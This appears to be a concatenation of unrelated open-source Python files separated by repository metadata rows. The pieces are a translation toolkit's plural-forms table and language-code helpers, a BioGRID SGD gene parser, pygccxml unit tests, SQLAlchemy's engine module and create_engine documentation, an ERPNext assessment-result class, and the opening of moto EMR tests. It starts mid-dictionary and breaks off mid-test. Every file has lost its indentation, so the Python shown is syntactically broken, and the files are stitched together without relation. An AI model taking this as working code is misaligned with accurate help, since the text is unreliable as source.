'chr': ['one', 'other'],
'ckb': ['one', 'other'],
'cs': ['one', 'few', 'other'],
'cy': ['zero', 'one', 'two', 'few', 'many', 'other'],
'da': ['one', 'other'],
'de': ['one', 'other'],
'dsb': ['one', 'two', 'few', 'other'],
'dv': ['one', 'other'],
'dz': ['other'],
'ee': ['one', 'other'],
'el': ['one', 'other'],
'en': ['one', 'other'],
'eo': ['one', 'other'],
'es': ['one', 'other'],
'et': ['one', 'other'],
'eu': ['one', 'other'],
'fa': ['one', 'other'],
'ff': ['one', 'other'],
'fi': ['one', 'other'],
'fil': ['one', 'other'],
'fo': ['one', 'other'],
'fr': ['one', 'other'],
'fur': ['one', 'other'],
'fy': ['one', 'other'],
'ga': ['one', 'two', 'few', 'many', 'other'],
'gd': ['one', 'two', 'few', 'other'],
'gl': ['one', 'other'],
'gsw': ['one', 'other'],
'gu': ['one', 'other'],
'guw': ['one', 'other'],
'gv': ['one', 'two', 'few', 'other'],
'ha': ['one', 'other'],
'haw': ['one', 'other'],
'he': ['one', 'two', 'many', 'other'],
'hi': ['one', 'other'],
'hr': ['one', 'few', 'other'],
'hsb': ['one', 'two', 'few', 'other'],
'hu': ['one', 'other'],
'hy': ['one', 'other'],
'id': ['other'],
'ig': ['other'],
'ii': ['other'],
'in': ['other'],
'io': ['one', 'other'],
'is': ['one', 'other'],
'it': ['one', 'other'],
'iu': ['one', 'two', 'other'],
'iw': ['one', 'two', 'many', 'other'],
'ja': ['other'],
'jbo': ['other'],
'jgo': ['one', 'other'],
'ji': ['one', 'other'],
'jmc': ['one', 'other'],
'jv': ['other'],
'jw': ['other'],
'ka': ['one', 'other'],
'kab': ['one', 'other'],
'kaj': ['one', 'other'],
'kcg': ['one', 'other'],
'kde': ['other'],
'kea': ['other'],
'kk': ['one', 'other'],
'kkj': ['one', 'other'],
'kl': ['one', 'other'],
'km': ['other'],
'kn': ['one', 'other'],
'ko': ['other'],
'ks': ['one', 'other'],
'ksb': ['one', 'other'],
'ksh': ['zero', 'one', 'other'],
'ku': ['one', 'other'],
'kw': ['one', 'two', 'other'],
'ky': ['one', 'other'],
'lag': ['zero', 'one', 'other'],
'lb': ['one', 'other'],
'lg': ['one', 'other'],
'lkt': ['other'],
'ln': ['one', 'other'],
'lo': ['other'],
'lt': ['one', 'few', 'other'],
'lv': ['zero', 'one', 'other'],
'mas': ['one', 'other'],
'mg': ['one', 'other'],
'mgo': ['one', 'other'],
'mk': ['one', 'other'],
'ml': ['one', 'other'],
'mn': ['one', 'other'],
'mo': ['one', 'few', 'other'],
'mr': ['one', 'other'],
'ms': ['other'],
'mt': ['one', 'few', 'many', 'other'],
'my': ['other'],
'nah': ['one', 'other'],
'naq': ['one', 'two', 'other'],
'nb': ['one', 'other'],
'nd': ['one', 'other'],
'ne': ['one', 'other'],
'nl': ['one', 'other'],
'nn': ['one', 'other'],
'nnh': ['one', 'other'],
'no': ['one', 'other'],
'nqo': ['other'],
'nr': ['one', 'other'],
'nso': ['one', 'other'],
'ny': ['one', 'other'],
'nyn': ['one', 'other'],
'om': ['one', 'other'],
'or': ['one', 'other'],
'os': ['one', 'other'],
'pa': ['one', 'other'],
'pap': ['one', 'other'],
'pl': ['one', 'few', 'many'],
'prg': ['zero', 'one', 'other'],
'ps': ['one', 'other'],
'pt': ['one', 'other'],
'pt_PT': ['one', 'other'],
'rm': ['one', 'other'],
'ro': ['one', 'few', 'other'],
'rof': ['one', 'other'],
'root': ['other'],
'ru': ['one', 'few', 'many'],
'rwk': ['one', 'other'],
'sah': ['other'],
'saq': ['one', 'other'],
'sd': ['one', 'other'],
'sdh': ['one', 'other'],
'se': ['one', 'two', 'other'],
'seh': ['one', 'other'],
'ses': ['other'],
'sg': ['other'],
'sh': ['one', 'few', 'other'],
'shi': ['one', 'few', 'other'],
'si': ['one', 'other'],
'sk': ['one', 'few', 'other'],
'sl': ['one', 'two', 'few', 'other'],
'sma': ['one', 'two', 'other'],
'smi': ['one', 'two', 'other'],
'smj': ['one', 'two', 'other'],
'smn': ['one', 'two', 'other'],
'sms': ['one', 'two', 'other'],
'sn': ['one', 'other'],
'so': ['one', 'other'],
'sq': ['one', 'other'],
'sr': ['one', 'few', 'other'],
'ss': ['one', 'other'],
'ssy': ['one', 'other'],
'st': ['one', 'other'],
'sv': ['one', 'other'],
'sw': ['one', 'other'],
'syr': ['one', 'other'],
'ta': ['one', 'other'],
'te': ['one', 'other'],
'teo': ['one', 'other'],
'th': ['other'],
'ti': ['one', 'other'],
'tig': ['one', 'other'],
'tk': ['one', 'other'],
'tl': ['one', 'other'],
'tn': ['one', 'other'],
'to': ['other'],
'tr': ['one', 'other'],
'ts': ['one', 'other'],
'tzm': ['one', 'other'],
'ug': ['one', 'other'],
'uk': ['one', 'few', 'many'],
'ur': ['one', 'other'],
'uz': ['one', 'other'],
've': ['one', 'other'],
'vi': ['other'],
'vo': ['one', 'other'],
'vun': ['one', 'other'],
'wa': ['one', 'other'],
'wae': ['one', 'other'],
'wo': ['other'],
'xh': ['one', 'other'],
'xog': ['one', 'other'],
'yi': ['one', 'other'],
'yo': ['other'],
'yue': ['other'],
'zh': ['other'],
'zu': ['one', 'other']
}
def simplercode(code):
"""This attempts to simplify the given language code by ignoring country
codes, for example.
.. seealso::
- http://www.rfc-editor.org/rfc/bcp/bcp47.txt
- http://www.rfc-editor.org/rfc/rfc4646.txt
- http://www.rfc-editor.org/rfc/rfc4647.txt
- http://www.w3.org/International/articles/language-tags/
"""
if not code:
return code
separator = normalize_code(code).rfind('-')
if separator >= 0:
return code[:separator]
else:
return ""
expansion_factors = {
'af': 0.1,
'ar': -0.09,
'es': 0.21,
'fr': 0.28,
'it': 0.2,
}
"""Source to target string length expansion factors."""
langcode_re = re.compile("^[a-z]{2,3}([_-][A-Z]{2,3}|)(@[a-zA-Z0-9]+|)$")
langcode_ire = re.compile("^[a-z]{2,3}([_-][a-z]{2,3})?(@[a-z0-9]+)?$",
re.IGNORECASE)
variant_re = re.compile("^[_-][A-Z]{2,3}(@[a-zA-Z0-9]+|)$")
def languagematch(languagecode, otherlanguagecode):
"""matches a languagecode to another, ignoring regions in the second"""
if languagecode is None:
return langcode_re.match(otherlanguagecode)
return (languagecode == otherlanguagecode or
(otherlanguagecode.startswith(languagecode) and
variant_re.match(otherlanguagecode[len(languagecode):])))
def get_country_iso_name(country_code):
"""Return country ISO name."""
country_code = country_code.upper()
try:
if len(country_code) == 2:
country = pycountry.countries.get(alpha_2=country_code)
else:
country = pycountry.countries.get(alpha_3=country_code)
if hasattr(country, 'common_name'):
return country.common_name
return country.name
except (KeyError, AttributeError):
return u""
def get_language_iso_name(language_code):
"""Return language ISO name."""
try:
if len(language_code) == 2:
language = pycountry.languages.get(alpha_2=language_code)
else:
language = pycountry.languages.get(alpha_3=language_code)
if hasattr(language, 'common_name'):
return language.common_name
return language.name
except (KeyError, AttributeError):
return u""
def get_language_iso_fullname(language_code):
"""Return language ISO fullname.
If language code is not a simple ISO 639 code, then we try to split into a
two part language code (ISO 639 and ISO 3166).
"""
if len(language_code) > 3:
language_code = language_code.replace("_", "-").replace("@", "-")
language_code = "-".join(language_code.split("-")[:2])
if "-" not in language_code:
return u""
language_code, country_code = language_code.split("-")
language_name = get_language_iso_name(language_code)
if not language_name:
return u""
country_name = get_country_iso_name(country_code)
if not country_name:
return u""
return u"%s (%s)" % (language_name, country_name)
return get_language_iso_name(language_code)
dialect_name_re = re.compile(r"(.+)\s\(([^)\d]{,25})\)$")
# The limit of 25 characters on the country name is so that "Interlingua (...)"
# (see above) is correctly interpreted.
def tr_lang(langcode=None):
"""Gives a function that can translate a language name, even in the form
``"language (country)"``, into the language with iso code langcode, or the
system language if no language is specified.
"""
langfunc = gettext_lang(langcode)
countryfunc = gettext_country(langcode)
def handlelanguage(name):
match = dialect_name_re.match(name)
if match:
language, country = match.groups()
if country != "macrolanguage":
return (
u"%s (%s)"
% (_fix_language_name(langfunc(language)),
countryfunc(country)))
return _fix_language_name(langfunc(name))
return handlelanguage
def _fix_language_name(name):
"""Identify and replace some unsightly names present in iso-codes.
If the name is present in _fixed_names we assume it is untranslated and we
replace it with a more usable rendering. If the remaining part is long and
includes a semi-colon, we only take the text up to the semi-colon to keep
things neat.
"""
if name in _fixed_names:
return _fixed_names[name]
elif len(name) > 11:
# These constants are somewhat arbitrary, but testing with the Japanese
# translation of ISO codes suggests these as the upper bounds.
split_point = name[5:].find(';')
if split_point >= 0:
return name[:5+split_point]
return name
def gettext_domain(langcode, domain, localedir=None):
"""Returns a gettext function for given iso domain"""
kwargs = dict(
domain=domain,
localedir=localedir,
fallback=True)
if langcode:
kwargs['languages'] = [langcode]
elif os.name == "nt":
# On Windows the default locale is not used for some reason
kwargs['languages'] = [locale.getdefaultlocale()[0]]
t = gettext.translation(**kwargs)
return t.ugettext if six.PY2 else t.gettext
def gettext_lang(langcode=None):
"""Returns a gettext function to translate language names into the given
language, or the system language if no language is specified.
"""
if pycountry is None:
return gettext_domain(langcode, 'iso_639')
return gettext_domain(langcode, 'iso639-3', pycountry.LOCALES_DIR)
def gettext_country(langcode=None):
"""Returns a gettext function to translate country names into the given
language, or the system language if no language is specified.
"""
if pycountry is None:
return gettext_domain(langcode, 'iso_3166')
return gettext_domain(langcode, 'iso3166', pycountry.LOCALES_DIR)
def normalize(string, normal_form="NFC"):
"""Return a unicode string in its normalized form
:param string: The string to be normalized
:param normal_form: NFC (default), NFD, NFKC, NFKD
:return: Normalized string
"""
if string is None:
return None
else:
import unicodedata
return unicodedata.normalize(normal_form, string)
def forceunicode(string):
"""Ensures that the string is in unicode.
:param string: A text string
:type string: Unicode, String
:return: String converted to Unicode and normalized as needed.
:rtype: Unicode
"""
if string is None:
return None
from translate.storage.placeables import StringElem
if isinstance(string, bytes):
encoding = getattr(string, "encoding", "utf-8")
string = string.decode(encoding)
elif isinstance(string, StringElem):
string = six.text_type(string)
return string
def normalized_unicode(string):
"""Forces the string to unicode and does normalization."""
return normalize(forceunicode(string))
def normalize_code(code):
if not code:
return code
return code.replace("_", "-").replace("@", "-").lower()
__normalised_languages = set(normalize_code(key) for key in languages.keys())
def simplify_to_common(language_code, languages=languages):
"""Simplify language code to the most commonly used form for the language,
stripping country information for languages that tend not to be localized
differently for different countries
"""
simpler = simplercode(language_code)
if simpler == "":
return language_code
if (normalize_code(language_code) in __normalised_languages):
return language_code
return simplify_to_common(simpler)
def get_language(code):
code = code.replace("-", "_").replace("@", "_").lower()
if "_" in code:
# convert ab_cd → ab_CD
code = "%s_%s" % (code.split("_")[0], code.split("_", 1)[1].upper())
return languages.get(code, None)
| gpl-2.0 | 7,579,215,694,755,113,000 | 34.118622 | 114 | 0.502706 | false |
starkfree/BioGRID-Annotation | SGD_parseGenes.py | 2 | 2124 |
# Parse annotation from SGD and use it to
# supplement the data already in place from
# entrez gene.
import Config
import sys, string
import MySQLdb
import Database
import gzip
from classes import ModelOrganisms
with Database.db as cursor :
sgd = ModelOrganisms.ModelOrganisms( Database.db, cursor )
sgdIDHash = sgd.buildSGDIDHash( )
with open( Config.SGD_FEATURES, 'r' ) as file :
for line in file.readlines( ) :
line = line.strip( )
splitLine = line.split( "\t" )
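# Fields consumed below from the tab-separated feature line:
# 0 = SGD ID, 1 = feature type, 3 = ORF/locus name, 4 = standard gene symbol,
# 5 = '|'-separated aliases, 7 = '|'-separated secondary SGD IDs, 15 = description.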
sgdID = splitLine[0].strip( )
sgdType = splitLine[1].strip( )
orfName = splitLine[3].strip( )
#if "LTR_RETROTRANSPOSON" == sgdType.upper( ) :
#print splitLine
geneID = "none"
if sgdID not in sgdIDHash :
if "LTR_RETROTRANSPOSON" == sgdType.upper( ) :
cursor.execute( "INSERT INTO " + Config.DB_NAME + ".genes VALUES( '0', %s, 'ordered locus', %s, 'retrotransposon', '559292', 'active', NOW( ), NOW( ), 'SGD', '0' )", [orfName, sgdID] )
Database.db.commit( )
geneID = str(cursor.lastrowid)
cursor.execute( "INSERT INTO " + Config.DB_NAME + ".gene_externals VALUES ('0',%s,'SGD','active',NOW( ), %s)", [sgdID,geneID] )
Database.db.commit( )
else :
# Process Addon Annotation
geneID = sgdIDHash[sgdID]
if geneID != "none" :
if "LTR_RETROTRANSPOSON" == sgdType.upper( ) :
cursor.execute( "UPDATE " + Config.DB_NAME + ".genes SET gene_updated = NOW( ) WHERE gene_id=%s", [geneID] )
Database.db.commit( )
officialSymbol = splitLine[4].strip( )
aliases = (splitLine[5].strip( )).split( "|" )
additionalSGDIDs = (splitLine[7].strip( )).split( "|" )
definition = splitLine[15].strip( )
sgd.processName( geneID, orfName, officialSymbol, "sgd-official", aliases )
sgd.processAddonSGDIDs( geneID, additionalSGDIDs )
sgd.processDefinition( geneID, definition, "SGD-DESCRIPTION" )
cursor.execute( "INSERT INTO " + Config.DB_STATS + ".update_tracker VALUES ( '0', 'SGD_parseGenes', NOW( ) )" )
Database.db.commit( )
sys.exit( )
| mit | -3,803,289,801,295,157,000 | 30.707692 | 189 | 0.618644 | false |
avaitla/Haskell-to-C---Bridge | pygccxml-1.0.0/unittests/namespace_matcher_tester.py | 1 | 2315 |
# Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import unittest
import autoconfig
import parser_test_case
from pygccxml import utils
from pygccxml import parser
from pygccxml import declarations
class tester_t( parser_test_case.parser_test_case_t ):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args ):
parser_test_case.parser_test_case_t.__init__( self, *args )
self.header = 'bit_fields.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse( [self.header], self.config )
def test( self ):
criteria = declarations.namespace_matcher_t( name='bit_fields' )
x = declarations.matcher.get_single( criteria, self.declarations )
self.failUnless( str(criteria) == '(decl type==namespace_t) and (name==bit_fields)' )
def test_allow_empty( self ):
global_ns = declarations.get_global_namespace( self.declarations )
global_ns.init_optimizer()
self.failUnless( 0 == len( global_ns.namespaces( 'does not exist', allow_empty=True ) ) )
class unnamed_ns_tester_t( parser_test_case.parser_test_case_t ):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args ):
parser_test_case.parser_test_case_t.__init__( self, *args )
self.header = 'unnamed_ns_bug.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse( [self.header], self.config )
def test( self ):
declarations.matcher.get_single(
declarations.namespace_matcher_t( name='::' )
, self.declarations )
def create_suite():
suite = unittest.TestSuite()
suite.addTest( unittest.makeSuite(tester_t))
suite.addTest( unittest.makeSuite(unnamed_ns_tester_t))
return suite
def run_suite():
unittest.TextTestRunner(verbosity=2).run( create_suite() )
if __name__ == "__main__":
run_suite() | bsd-3-clause | -21,918,521,984,624,264 | 35.983607 | 97 | 0.619438 | false |
karthik339/Agni | MainDemo/flask/lib/python2.7/site-packages/sqlalchemy/engine/__init__.py | 18 | 16353 |
# engine/__init__.py
# Copyright (C) 2005-2012 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""SQL connections, SQL execution and high-level DB-API interface.
The engine package defines the basic components used to interface
DB-API modules with higher-level statement construction,
connection-management, execution and result contexts. The primary
"entry point" class into this package is the Engine and it's public
constructor ``create_engine()``.
This package includes:
base.py
Defines interface classes and some implementation classes which
comprise the basic components used to interface between a DB-API,
constructed and plain-text statements, connections, transactions,
and results.
default.py
Contains default implementations of some of the components defined
in base.py. All current database dialects use the classes in
default.py as base classes for their own database-specific
implementations.
strategies.py
The mechanics of constructing ``Engine`` objects are represented
here. Defines the ``EngineStrategy`` class which represents how
to go from arguments specified to the ``create_engine()``
function, to a fully constructed ``Engine``, including
initialization of connection pooling, dialects, and specific
subclasses of ``Engine``.
threadlocal.py
The ``TLEngine`` class is defined here, which is a subclass of
the generic ``Engine`` and tracks ``Connection`` and
``Transaction`` objects against the identity of the current
thread. This allows certain programming patterns based around
the concept of a "thread-local connection" to be possible.
The ``TLEngine`` is created by using the "threadlocal" engine
strategy in conjunction with the ``create_engine()`` function.
url.py
Defines the ``URL`` class which represents the individual
components of a string URL passed to ``create_engine()``. Also
defines a basic module-loading strategy for the dialect specifier
within a URL.
"""
# not sure what this was used for
#import sqlalchemy.databases
from sqlalchemy.engine.base import (
BufferedColumnResultProxy,
BufferedColumnRow,
BufferedRowResultProxy,
Compiled,
Connectable,
Connection,
Dialect,
Engine,
ExecutionContext,
NestedTransaction,
ResultProxy,
RootTransaction,
RowProxy,
Transaction,
TwoPhaseTransaction,
TypeCompiler
)
from sqlalchemy.engine import strategies
from sqlalchemy import util
__all__ = (
'BufferedColumnResultProxy',
'BufferedColumnRow',
'BufferedRowResultProxy',
'Compiled',
'Connectable',
'Connection',
'Dialect',
'Engine',
'ExecutionContext',
'NestedTransaction',
'ResultProxy',
'RootTransaction',
'RowProxy',
'Transaction',
'TwoPhaseTransaction',
'TypeCompiler',
'create_engine',
'engine_from_config',
)
default_strategy = 'plain'
def create_engine(*args, **kwargs):
"""Create a new :class:`.Engine` instance.
The standard calling form is to send the URL as the
first positional argument, usually a string
that indicates database dialect and connection arguments.
Additional keyword arguments may then follow it which
establish various options on the resulting :class:`.Engine`
and its underlying :class:`.Dialect` and :class:`.Pool`
constructs.
The string form of the URL is
``dialect+driver://user:password@host/dbname[?key=value..]``, where
``dialect`` is a database name such as ``mysql``, ``oracle``,
``postgresql``, etc., and ``driver`` the name of a DBAPI, such as
``psycopg2``, ``pyodbc``, ``cx_oracle``, etc. Alternatively,
the URL can be an instance of :class:`~sqlalchemy.engine.url.URL`.
``**kwargs`` takes a wide variety of options which are routed
towards their appropriate components. Arguments may be
specific to the :class:`.Engine`, the underlying :class:`.Dialect`, as well as the
:class:`.Pool`. Specific dialects also accept keyword arguments that
are unique to that dialect. Here, we describe the parameters
that are common to most :func:`.create_engine()` usage.
Once established, the newly resulting :class:`.Engine` will
request a connection from the underlying :class:`.Pool` once
:meth:`.Engine.connect` is called, or a method which depends on it
such as :meth:`.Engine.execute` is invoked. The :class:`.Pool` in turn
will establish the first actual DBAPI connection when this request
is received. The :func:`.create_engine` call itself does **not**
establish any actual DBAPI connections directly.
See also:
:ref:`engines_toplevel`
:ref:`connections_toplevel`
:param assert_unicode: Deprecated. This flag
sets an engine-wide default value for
the ``assert_unicode`` flag on the
:class:`.String` type - see that
type for further details.
:param connect_args: a dictionary of options which will be
passed directly to the DBAPI's ``connect()`` method as
additional keyword arguments. See the example
at :ref:`custom_dbapi_args`.
:param convert_unicode=False: if set to True, sets
the default behavior of ``convert_unicode`` on the
:class:`.String` type to ``True``, regardless
of a setting of ``False`` on an individual
:class:`.String` type, thus causing all :class:`.String`
-based columns
to accommodate Python ``unicode`` objects. This flag
is useful as an engine-wide setting when using a
DBAPI that does not natively support Python
``unicode`` objects and raises an error when
one is received (such as pyodbc with FreeTDS).
See :class:`.String` for further details on
what this flag indicates.
:param creator: a callable which returns a DBAPI connection.
This creation function will be passed to the underlying
connection pool and will be used to create all new database
connections. Usage of this function causes connection
parameters specified in the URL argument to be bypassed.
:param echo=False: if True, the Engine will log all statements
as well as a repr() of their parameter lists to the engines
logger, which defaults to sys.stdout. The ``echo`` attribute of
``Engine`` can be modified at any time to turn logging on and
off. If set to the string ``"debug"``, result rows will be
printed to the standard output as well. This flag ultimately
controls a Python logger; see :ref:`dbengine_logging` for
information on how to configure logging directly.
:param echo_pool=False: if True, the connection pool will log
all checkouts/checkins to the logging stream, which defaults to
sys.stdout. This flag ultimately controls a Python logger; see
:ref:`dbengine_logging` for information on how to configure logging
directly.
:param encoding: Defaults to ``utf-8``. This is the string
encoding used by SQLAlchemy for string encode/decode
operations which occur within SQLAlchemy, **outside of
the DBAPI.** Most modern DBAPIs feature some degree of
direct support for Python ``unicode`` objects,
what you see in Python 2 as a string of the form
``u'some string'``. For those scenarios where the
DBAPI is detected as not supporting a Python ``unicode``
object, this encoding is used to determine the
source/destination encoding. It is **not used**
for those cases where the DBAPI handles unicode
directly.
To properly configure a system to accommodate Python
``unicode`` objects, the DBAPI should be
configured to handle unicode to the greatest
degree as is appropriate - see
the notes on unicode pertaining to the specific
target database in use at :ref:`dialect_toplevel`.
Areas where string encoding may need to be accommodated
outside of the DBAPI include zero or more of:
* the values passed to bound parameters, corresponding to
the :class:`.Unicode` type or the :class:`.String` type
when ``convert_unicode`` is ``True``;
* the values returned in result set columns corresponding
to the :class:`.Unicode` type or the :class:`.String`
type when ``convert_unicode`` is ``True``;
* the string SQL statement passed to the DBAPI's
``cursor.execute()`` method;
* the string names of the keys in the bound parameter
dictionary passed to the DBAPI's ``cursor.execute()``
as well as ``cursor.setinputsizes()`` methods;
* the string column names retrieved from the DBAPI's
``cursor.description`` attribute.
When using Python 3, the DBAPI is required to support
*all* of the above values as Python ``unicode`` objects,
which in Python 3 are just known as ``str``. In Python 2,
the DBAPI does not specify unicode behavior at all,
so SQLAlchemy must make decisions for each of the above
values on a per-DBAPI basis - implementations are
completely inconsistent in their behavior.
:param execution_options: Dictionary execution options which will
be applied to all connections. See
:meth:`~sqlalchemy.engine.base.Connection.execution_options`
:param implicit_returning=True: When ``True``, a RETURNING-
compatible construct, if available, will be used to
fetch newly generated primary key values when a single row
INSERT statement is emitted with no existing returning()
clause. This applies to those backends which support RETURNING
or a compatible construct, including Postgresql, Firebird, Oracle,
Microsoft SQL Server. Set this to ``False`` to disable
the automatic usage of RETURNING.
:param label_length=None: optional integer value which limits
the size of dynamically generated column labels to that many
characters. If less than 6, labels are generated as
"_(counter)". If ``None``, the value of
``dialect.max_identifier_length`` is used instead.
:param listeners: A list of one or more
:class:`~sqlalchemy.interfaces.PoolListener` objects which will
receive connection pool events.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.engine" logger. Defaults to a hexstring of the
object's id.
:param max_overflow=10: the number of connections to allow in
connection pool "overflow", that is connections that can be
opened above and beyond the pool_size setting, which defaults
to five. this is only used with :class:`~sqlalchemy.pool.QueuePool`.
:param module=None: reference to a Python module object (the module itself, not
its string name). Specifies an alternate DBAPI module to be used
by the engine's dialect. Each sub-dialect references a specific DBAPI which
will be imported before first connect. This parameter causes the
import to be bypassed, and the given module to be used instead.
Can be used for testing of DBAPIs as well as to inject "mock"
DBAPI implementations into the :class:`.Engine`.
:param pool=None: an already-constructed instance of
:class:`~sqlalchemy.pool.Pool`, such as a
:class:`~sqlalchemy.pool.QueuePool` instance. If non-None, this
pool will be used directly as the underlying connection pool
for the engine, bypassing whatever connection parameters are
present in the URL argument. For information on constructing
connection pools manually, see :ref:`pooling_toplevel`.
:param poolclass=None: a :class:`~sqlalchemy.pool.Pool`
subclass, which will be used to create a connection pool
instance using the connection parameters given in the URL. Note
this differs from ``pool`` in that you don't actually
instantiate the pool in this case, you just indicate what type
of pool to be used.
:param pool_logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
:param pool_size=5: the number of connections to keep open
inside the connection pool. This used with :class:`~sqlalchemy.pool.QueuePool` as
well as :class:`~sqlalchemy.pool.SingletonThreadPool`. With
:class:`~sqlalchemy.pool.QueuePool`, a ``pool_size`` setting
of 0 indicates no limit; to disable pooling, set ``poolclass`` to
:class:`~sqlalchemy.pool.NullPool` instead.
:param pool_recycle=-1: this setting causes the pool to recycle
connections after the given number of seconds has passed. It
defaults to -1, or no timeout. For example, setting to 3600
means connections will be recycled after one hour. Note that
MySQL in particular will disconnect automatically if no
activity is detected on a connection for eight hours (although
this is configurable with the MySQLDB connection itself and the
server configuration as well).
:param pool_reset_on_return='rollback': set the "reset on return"
behavior of the pool, which is whether ``rollback()``,
``commit()``, or nothing is called upon connections
being returned to the pool. See the docstring for
``reset_on_return`` at :class:`.Pool`.
.. versionadded:: 0.7.6
:param pool_timeout=30: number of seconds to wait before giving
up on getting a connection from the pool. This is only used
with :class:`~sqlalchemy.pool.QueuePool`.
:param strategy='plain': selects alternate engine implementations.
Currently available are:
* the ``threadlocal`` strategy, which is described in
:ref:`threadlocal_strategy`;
* the ``mock`` strategy, which dispatches all statement
execution to a function passed as the argument ``executor``.
See `example in the FAQ <http://www.sqlalchemy.org/trac/wiki/FAQ#HowcanIgettheCREATETABLEDROPTABLEoutputasastring>`_.
:param executor=None: a function taking arguments
``(sql, *multiparams, **params)``, to which the ``mock`` strategy will
dispatch all statement execution. Used only by ``strategy='mock'``.
"""
strategy = kwargs.pop('strategy', default_strategy)
strategy = strategies.strategies[strategy]
return strategy.create(*args, **kwargs)
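# Illustrative sketch (not part of the original module): how the pooling
# parameters documented above are typically passed to this module's
# create_engine() defined just above. The SQLite URL and the specific option
# values are assumptions chosen only to keep the example self-contained;
# pool_size/max_overflow apply when QueuePool is in use, which is the default
# for most non-SQLite dialects.
def _example_create_engine_with_pooling():  # pragma: no cover - illustration only
    engine = create_engine('sqlite://',
                           echo=False,         # no SQL statement logging
                           pool_recycle=3600)  # recycle connections hourly
    return engine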
def engine_from_config(configuration, prefix='sqlalchemy.', **kwargs):
"""Create a new Engine instance using a configuration dictionary.
The dictionary is typically produced from a config file where keys
are prefixed, such as sqlalchemy.url, sqlalchemy.echo, etc. The
'prefix' argument indicates the prefix to be searched for.
A select set of keyword arguments will be "coerced" to their
expected type based on string values. In a future release, this
functionality will be expanded and include dialect-specific
arguments.
"""
opts = _coerce_config(configuration, prefix)
opts.update(kwargs)
url = opts.pop('url')
return create_engine(url, **opts)
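# Illustrative sketch (not part of the original module): engine_from_config()
# with a prefixed dictionary such as one parsed from an .ini file. The URL and
# option values are assumptions; note that string values like 'false' and
# '3600' are coerced by _coerce_config() before create_engine() sees them.
def _example_engine_from_config():  # pragma: no cover - illustration only
    config = {
        'sqlalchemy.url': 'sqlite://',
        'sqlalchemy.echo': 'false',         # coerced to a boolean
        'sqlalchemy.pool_recycle': '3600',  # coerced to an int
    }
    return engine_from_config(config, prefix='sqlalchemy.')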
def _coerce_config(configuration, prefix):
"""Convert configuration values to expected types."""
options = dict((key[len(prefix):], configuration[key])
for key in configuration
if key.startswith(prefix))
for option, type_ in (
('convert_unicode', util.bool_or_str('force')),
('pool_timeout', int),
('echo', util.bool_or_str('debug')),
('echo_pool', util.bool_or_str('debug')),
('pool_recycle', int),
('pool_size', int),
('max_overflow', int),
('pool_threadlocal', bool),
('use_native_unicode', bool),
):
util.coerce_kw_type(options, option, type_)
return options
| apache-2.0 | 4,041,809,653,253,141,500 | 42.492021 | 127 | 0.687458 | false |
indictranstech/erpnext | erpnext/education/doctype/assessment_result/assessment_result.py | 2 | 1970 | # -*- coding: utf-8 -*-
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe.utils import flt
from frappe.model.document import Document
from erpnext.education.api import get_grade
from erpnext.education.api import get_assessment_details
from frappe.utils.csvutils import getlink
class AssessmentResult(Document):
def validate(self):
if self.student and not self.student_name:
self.student_name = frappe.db.get_value("Student", self.student, "title")
self.grading_scale = frappe.db.get_value("Assessment Plan", self.assessment_plan, "grading_scale")
self.validate_maximum_score()
self.validate_grade()
self.validate_duplicate()
def validate_maximum_score(self):
self.maximum_score = frappe.db.get_value("Assessment Plan", self.assessment_plan, "maximum_assessment_score")
assessment_details = get_assessment_details(self.assessment_plan)
max_scores = {}
for d in assessment_details:
max_scores.update({d.assessment_criteria: d.maximum_score})
for d in self.details:
d.maximum_score = max_scores.get(d.assessment_criteria)
if d.score > d.maximum_score:
frappe.throw(_("Score cannot be greater than Maximum Score"))
def validate_grade(self):
self.total_score = 0.0
for d in self.details:
d.grade = get_grade(self.grading_scale, (flt(d.score)/d.maximum_score)*100)
self.total_score += d.score
self.grade = get_grade(self.grading_scale, (self.total_score/self.maximum_score)*100)
def validate_duplicate(self):
assessment_result = frappe.get_list("Assessment Result", filters={"name": ("not in", [self.name]),
"student":self.student, "assessment_plan":self.assessment_plan, "docstatus":("!=", 2)})
if assessment_result:
frappe.throw(_("Assessment Result record {0} already exists.".format(getlink("Assessment Result",assessment_result[0].name))))
| agpl-3.0 | -1,406,481,047,795,354,600 | 37.627451 | 129 | 0.737563 | false |
okomestudio/moto | tests/test_emr/test_emr.py | 5 | 24251 | from __future__ import unicode_literals
import time
from datetime import datetime
import boto
import pytz
from boto.emr.bootstrap_action import BootstrapAction
from boto.emr.instance_group import InstanceGroup
from boto.emr.step import StreamingStep
import six
import sure # noqa
from moto import mock_emr_deprecated
from tests.helpers import requires_boto_gte
run_jobflow_args = dict(
job_flow_role='EMR_EC2_DefaultRole',
keep_alive=True,
log_uri='s3://some_bucket/jobflow_logs',
master_instance_type='c1.medium',
name='My jobflow',
num_instances=2,
service_role='EMR_DefaultRole',
slave_instance_type='c1.medium',
)
input_instance_groups = [
InstanceGroup(1, 'MASTER', 'c1.medium', 'ON_DEMAND', 'master'),
InstanceGroup(3, 'CORE', 'c1.medium', 'ON_DEMAND', 'core'),
InstanceGroup(6, 'TASK', 'c1.large', 'SPOT', 'task-1', '0.07'),
InstanceGroup(10, 'TASK', 'c1.xlarge', 'SPOT', 'task-2', '0.05'),
]
@mock_emr_deprecated
def test_describe_cluster():
conn = boto.connect_emr()
args = run_jobflow_args.copy()
args.update(dict(
api_params={
'Applications.member.1.Name': 'Spark',
'Applications.member.1.Version': '2.4.2',
'Configurations.member.1.Classification': 'yarn-site',
'Configurations.member.1.Properties.entry.1.key': 'someproperty',
'Configurations.member.1.Properties.entry.1.value': 'somevalue',
'Configurations.member.1.Properties.entry.2.key': 'someotherproperty',
